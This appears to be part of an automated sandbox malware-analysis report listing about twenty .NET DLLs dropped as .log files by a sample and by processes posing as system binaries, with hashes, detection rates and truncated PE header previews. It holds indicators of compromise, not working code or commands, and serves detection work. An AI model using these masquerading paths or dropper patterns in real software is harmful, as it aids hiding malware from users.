File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EfqhSByg.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FUcZRGSD.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HpEyVDEi.log

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IFwiuxEU.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IuPYVmtj.log

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MbnYeHgo.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MegGnYKL.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MwnZBuEN.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NJzXBuON.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OsAnoSoB.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\OvnXGXyF.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PfChbXEz.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PtwPpPmY.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QKWXiCZs.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\RYXOEfJQ.log

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UXfGEDIo.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UpgEQnOA.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\VeGplWJv.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VponRhip.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WWWWHnjp.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XYvNpROm.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
